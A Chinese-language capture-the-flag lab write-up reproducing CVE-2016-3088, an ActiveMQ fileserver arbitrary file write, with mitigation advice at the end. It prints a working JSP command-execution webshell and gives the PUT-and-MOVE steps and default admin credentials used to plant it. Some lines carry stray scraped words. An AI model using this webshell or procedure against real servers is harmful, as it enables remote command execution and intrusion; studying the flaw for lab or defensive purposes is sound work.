ActiveMQ任意文件写入漏洞分析溯源
墨者学院
WEB安全
ActiveMQ任意文件写入漏洞分析溯源
ActiveMQ 简介
ActiveMQ 是 Apache 软件基金会下的一个开源消息驱动中间件软件。Jetty 是一个开源的 servlet 容器,它为基于 Java
的 web 容器,例如 JSP 和 servlet 提供运行环境。ActiveMQ 5.0
及之后版本默认集成了jetty。在启动后提供一个监控 ActiveMQ 的 Web 应用html
fileserver是一个RESTful API接口,咱们能够经过GET、PUT、DELETE等HTTP请求对其中存储的文件进行读写操做,其设计目的是为了弥补消息队列操做不能传输、存储二进制文件的缺陷,但后来发现:java
- 其使用率并不高
- 文件操做容易出现漏洞
漏洞复现
-
访问urlweb
![[外链图片转存失败(img-1HKCRMhE-1567593936607)(C:\Users\13659\AppData\Roaming\Typora\typora-user-images\1567586846125.png)]](http://static.javashuo.com/static/loading.gif)
-
查找漏洞shell
搜索发现存在CVE-2016-3088 漏洞,找到分析查看漏洞缘由api
查询发如今ActiveMQ<5.12.x版本存在fileserver 应用,能够经过fileserver写入文件(不解析jsp文件)经过移动到任意位置,就能够形成任意文件写入漏洞。安全
文件写入的几种利用方式ssh
1 写入webshelljsp
2 写入 cron 或 ssh keysvg
3 写入 jar 或 jetty.xml 等库和配置文件url
写入webshell的好处是,门槛低更方便,但前面也说了fileserver不解析jsp,admin和api两个应用都须要登陆才能访问,因此有点鸡肋;写入cron或ssh
key,好处是直接反弹拿shell,也比较方便,缺点是须要root权限;写入jar,稍微麻烦点(须要jar的后门),写入xml配置文件,这个方法比较靠谱,但有个鸡肋点是:咱们须要知道activemq的绝对路径。 -
漏洞利用
尝试写入jsp
有回显带密码验证的 <% if("023".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<pre>"); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("</pre>"); } %> 请求url:http://ip:port/Shell/cmd2.jsp?pwd=023&i=ls经过burp访问,发现须要验证,须要登陆,咱们尝试登陆,默认的ActiveMQ的帐号和密码均为admin
登陆后查看http方法 ,发现没有put方法
执行put方法 发现却上传成功了
接下来经过move移动到admin或api下,就能够解析jsp文件了, 查找他的绝对路径
访问url:http://ip:port/admin/test/systemProperties.jsp
经过move方法将jsp木马移动到admin或api下,进行解析
而后访问,能够执行命令,
这里就能够直接查看flag,可是找了半天没找到,最后在根目录找到了flag
解决方案
- ActiveMQ Fileserver 的功能在 5.14.0 及其之后的版本中已被移除。建议用户升级至 5.14.0 及其之后版本。
- 经过移除 conf\jetty.xml 的如下配置来禁用 ActiveMQ Fileserver 功能